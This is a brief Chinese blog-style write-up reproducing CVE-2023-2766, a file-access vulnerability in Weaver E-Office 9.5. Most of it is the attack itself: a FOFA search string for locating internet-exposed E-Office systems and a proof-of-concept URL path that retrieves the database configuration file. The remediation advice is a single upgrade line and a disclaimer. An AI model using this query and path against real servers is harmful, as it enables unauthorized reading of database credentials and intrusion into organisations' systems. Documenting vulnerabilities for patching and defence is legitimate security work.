简介

Weaver E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。

Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。

漏洞编号：CVE-2023-2766

漏洞复现

FOFA语法：

app="泛微-EOffice"

访问界面如下：

POC：/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

拼接URL进行访问：

https://IP:PORT//building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

成功访问到数据库配置文件。

修复建议

厂商已发布升级补丁以修复漏洞，升级至新版本

免责声明

文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！！！

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。